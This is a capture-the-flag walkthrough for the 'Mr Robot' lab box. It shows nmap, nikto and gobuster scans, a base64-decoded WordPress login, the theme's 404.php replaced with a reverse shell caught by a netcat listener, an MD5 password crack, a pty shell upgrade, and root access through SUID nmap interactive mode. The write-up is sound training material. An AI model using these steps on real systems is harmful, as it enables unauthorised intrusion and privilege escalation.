Mr Robot
Key 1
nmap -sC -sV 10.10.245.29
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-15 01:51 GMT
Nmap scan report for 10.10.245.29
Host is up (0.055s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.68 seconds
curl -s http://10.10.245.29/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
curl -s http://10.10.245.29/key-1-of-3.txt
key1
Key 2
fsocity.dic appears to be a dictionary with usernames and passwords.
Nikto
nikto -h 10.10.245.29
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.245.29
+ Target Hostname: 10.10.245.29
+ Target Port: 80
+ Start Time: 2022-12-15 02:07:17 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://10.10.245.29/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7889 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2022-12-15 02:20:20 (GMT0) (783 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Gobuster
gobuster dir -u http://10.10.245.29 -w /usr/share/wordlists/dirb/common.txt -o directories.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.245.29
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/15 02:29:45 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/0 (Status: 301) [Size: 0] [--> http://10.10.245.29/0/]
/admin (Status: 301) [Size: 234] [--> http://10.10.245.29/admin/]
/atom (Status: 301) [Size: 0] [--> http://10.10.245.29/feed/atom/]
/audio (Status: 301) [Size: 234] [--> http://10.10.245.29/audio/]
/blog (Status: 301) [Size: 233] [--> http://10.10.245.29/blog/]
/css (Status: 301) [Size: 232] [--> http://10.10.245.29/css/]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.245.29/wp-admin/]
/favicon.ico (Status: 200) [Size: 0]
/feed (Status: 301) [Size: 0] [--> http://10.10.245.29/feed/]
/images (Status: 301) [Size: 235] [--> http://10.10.245.29/images/]
/Image (Status: 301) [Size: 0] [--> http://10.10.245.29/Image/]
/image (Status: 301) [Size: 0] [--> http://10.10.245.29/image/]
/index.html (Status: 200) [Size: 1188]
/index.php (Status: 301) [Size: 0] [--> http://10.10.245.29/]
/intro (Status: 200) [Size: 516314]
/js (Status: 301) [Size: 231] [--> http://10.10.245.29/js/]
/license (Status: 200) [Size: 309]
/login (Status: 302) [Size: 0] [--> http://10.10.245.29/wp-login.php]
/page1 (Status: 301) [Size: 0] [--> http://10.10.245.29/]
/phpmyadmin (Status: 403) [Size: 94]
/readme (Status: 200) [Size: 64]
/rdf (Status: 301) [Size: 0] [--> http://10.10.245.29/feed/rdf/]
/robots (Status: 200) [Size: 41]
/robots.txt (Status: 200) [Size: 41]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.245.29/feed/]
/rss (Status: 301) [Size: 0] [--> http://10.10.245.29/feed/]
/sitemap (Status: 200) [Size: 0]
/sitemap.xml (Status: 200) [Size: 0]
/video (Status: 301) [Size: 234] [--> http://10.10.245.29/video/]
/wp-admin (Status: 301) [Size: 237] [--> http://10.10.245.29/wp-admin/]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.245.29/wp-content/]
/wp-config (Status: 200) [Size: 0]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.245.29/wp-includes/]
/wp-cron (Status: 200) [Size: 0]
/wp-load (Status: 200) [Size: 0]
/wp-links-opml (Status: 200) [Size: 227]
/wp-mail (Status: 500) [Size: 3064]
/wp-login (Status: 200) [Size: 2664]
/wp-settings (Status: 500) [Size: 0]
/wp-signup (Status: 302) [Size: 0] [--> http://10.10.245.29/wp-login.php?action=register]
/xmlrpc (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
Progress: 4614 / 4615 (99.98%)
===============================================================
2022/12/15 02:37:48 Finished
===============================================================
O, hey, a wp-login. And OSVDB-3092: /license.txt: License file found may identify site software.
License
curl -s http://10.10.245.29/license | tr -d "\n"
blabla ZWxsaW90OkVSMjgtMDY1Mgo=
echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
elliot:ER28-0652
Login with the credentials: http://10.10.245.29/wp-login
Replacing the 404.php with the monkeytest reverse shell.
And open a listener on the Kali machine.
nc -nlvp 1234
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.245.29.
Ncat: Connection from 10.10.245.29:49295.
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
02:57:09 up 1:06, 0 users, load average: 0.00, 0.10, 0.74
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ cd /home/robot
$ ls
key-2-of-3.txt
password.raw-md5
$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
Look up the md5.
And su - robot. Oh! su: must be run from a terminal.
$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/sh")'
Now su:
$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
whoami
robot
$ cat key-2-of-3.txt
cat key-2-of-3.txt
Key 3
$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !ls /root
!ls /root
firstboot_done key-3-of-3.txt
waiting to reap child : No child processes
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt